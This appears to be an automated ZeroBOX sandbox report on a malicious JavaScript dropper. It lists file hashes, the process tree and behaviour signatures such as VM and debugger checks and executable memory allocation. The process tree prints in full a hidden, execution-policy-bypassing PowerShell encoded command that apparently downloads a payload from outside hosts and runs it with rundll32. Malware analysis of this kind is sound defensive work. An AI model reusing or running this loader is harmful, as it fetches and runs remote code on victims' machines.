Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 16, 2023, 10:33 a.m.	May 16, 2023, 10:35 a.m.

Size	177.4KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`370ad852dc41b1cdd740254c7b914f89`
SHA256	`66af584bf58263baf821f8f19ecb2d0a20cf356a6b98d9e5320db600bfdece0f`
CRC32	`7C5B7ECD`
ssdeep	`3072:xmprC+MFeHKYuiuyXzC3FW08AbLm58LD2AXbekxuCRIpFaEC3oBP4sSBWZ4Lla3L:xkHKYuiuyXzC3FW08AbLm58LD2AXbek+`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Guabsl.js
2556
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Guabsl.js" devolvementNonhectic SemicoagulatedTogawise Menhir
  2688
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABPAHYAZQByAHQAYQBzAGsAcwBSAGUAcABlAHQAYQB0AGkAdgBlAGwAeQAgAD0AIAAiAEEAZABpAHAAbwBzAGUAbgBlAHMAcwBBAGQAaQBhAGIAYQB0ACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJABDAGgAYQByAGEAYwB0AGUAcgBvAGwAbwBnAGkAYwBhAGwAbAB5ACAAPQAgACIAUwBoAGUAYgBhAG4AZwBzACIAOwAkAGgAZQB5AGQAYQB5AFAAbABpAG0AcwBvAGwAIAA9ACAAMQA3ADIAOwAkAG0AYQBjAHIAbwBzAGUAaQBzAG0AbwBnAHIAYQBwAGgAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAEEAQQB2AEEARwBZAEEAYQBnAEIATwBBAEUAawBBAFYAQQBCAHcAQQBHAE0AQQBMAHcAQQA1AEEARQAwAEEAUgB3AEIANgBBAEcAbwBBAHUATgBtAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBNAEEAQQAxAEEASABFAEEAYwBBAEIAYQBBAEUAawBBAE4AZwBCAEcAQQBFADAAQQBTAGcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABoAGkAYQBsAGEAZQAgAGkAbgAgACQAbQBhAGMAcgBvAHMAZQBpAHMAbQBvAGcAcgBhAHAAaAAgAC0AcwBwAGwAaQB0ACAAIgB1AE4AbQBoACIAKQAgAHsAJABuAG8AbgBmAGEAYwBlAHQAaQBvAHUAcwBuAGUAcwBzACAAPQAgACIAbgBlAGUAZABtAGUAbgB0AEIAZQBjAHUAZABnAGUAbABlAGQAIgA7ACQAQQBuAHQAaABvAGcAcgBhAHAAaAB5AFIAZQBmAHIAYQBtAGUAZAAgAD0AIAA0ADYANgA7AHQAcgB5ACAAewAkAFMAcAB1AHQAdABlAHIAZQBkAE0AZQB0AGEAYgBvAGwAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAHcAQQB1AEEARABnAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQAwAEEARABBAEEAeABSAEsASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBADQAQQBDADQAQQBPAFEAQQA0AEEAQQA9AD0AIgA7ACQAdgBpAGcAZwBsAGUAIAA9ACAANAA3ADgAOwAkAEUAcABoAHIAYQBpAG0AaQB0AGkAYwAgAD0AIAAiAFIAZQBjAG8AZwBuAGkAegBpAG4AZwBQAG8AbABlAGEAeABpAG4AZwAiADsAJABVAG4AaABvAGUAZABUAGUAcgBjAGUAbABlAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUABoAGkAYQBsAGEAZQApACkAOwBpAHcAcgAgACQAVQBuAGgAbwBlAGQAVABlAHIAYwBlAGwAZQB0ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdABoAG8AbABlAGQAQwBvAG4AYwBlAHAAdAB1AGEAbABpAHoAZQBkAC4AdAByAGEAZABlAHMAcABlAHIAcwBvAG4AVQBuAHIAaQBmAGYAbABlAGQAOwAkAEkAbQBwAGUAdAByAGEAdABpAG4AZwAgAD0AIAA1ADMAOAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAB0AGgAbwBsAGUAZABDAG8AbgBjAGUAcAB0AHUAYQBsAGkAegBlAGQALgB0AHIAYQBkAGUAcwBwAGUAcgBzAG8AbgBVAG4AcgBpAGYAZgBsAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADYAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBkAEEAQgBvAEEARwA4AEEAYgBBAEIAbABBAEcAUQBBAFEAdwBCAHYAQQBHADQAQQBZAHcAQgBsAEEASABBAEEAZABBAEIAMQBBAEcARQBBAGIAQQBCAHAAQQBIAG8AQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAeQBBAEcARQBBAFoAQQBCAGwAQQBIAE0AQQBjAEEAQgBsAEEASABJAEEAYwB3AEIAdgBBAEcANABBAFYAUQBCAHUAQQBIAEkAQQBhAFEAQgBtAEEARwBZAEEAYgBBAEIAbABBAEcAUQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAGcAcgBhAG4AZwBlAHIAaQBzAGUAcgBBAHQAaABlAG8AbABvAGcAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB4AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAEwAZwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAeQBBAEEAPQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBZAHcAQgAwAEEASABVAEEAWQBRAEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBIAFEAQQBkAGcAQQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABZAEEATgBBAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBDADQAQQBPAEEAQQAxAEEAQQA9AD0AVAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGIAdwBCAHYAQQBHAHcAQQBiAFEAQgBoAEEARwBzAEEAWgBRAEIAeQBBAEUATQBBAGEAQQBCADUAQQBHAHcAQQBiAHcAQgBqAEEARwBFAEEAZABRAEIAcwBBAEgAawBBAEwAZwBCAHUAQQBIAEkAQQBkAHcAQQA9ACIAOwAkAFMAdABhAHQAdQBhAHIAaQBzAG0AIAA9ACAAIgBQAHIAZQBmAHUAbABnAGUAbgB0AE8AcwB0AGUAbwBtAGEAdABvAGkAZAAiADsAYgByAGUAYQBrADsATgBlAHgAdABKAFMAOwB9AE4AZQB4AHQASgBTADsAfQAgAGMAYQB0AGMAaAAgAHsAJABiAGUAYQByAHcAYQByAGQAIAA9ACAANAAwADYAOwB9AH0AJABzAG4AYQBwAHAAaQBzAGgATABlAGgAcgBtAGEAbgAgAD0AIAA3ADMAOAA7AA=="
    2808

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 16, 2023, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 16, 2023, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 10:33 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 16, 2023, 10:33 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00391ee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003928e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003928e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003928e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003928e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003928e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003928e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00391d28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00391d28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00391d28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003925e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003929a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003929a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003929a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003929a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 16, 2023, 10:33 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 135 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 2097152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02950000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0221a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02227000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02212000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02225000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0221c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02213000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02214000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02215000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02216000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02217000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02218000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02219000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
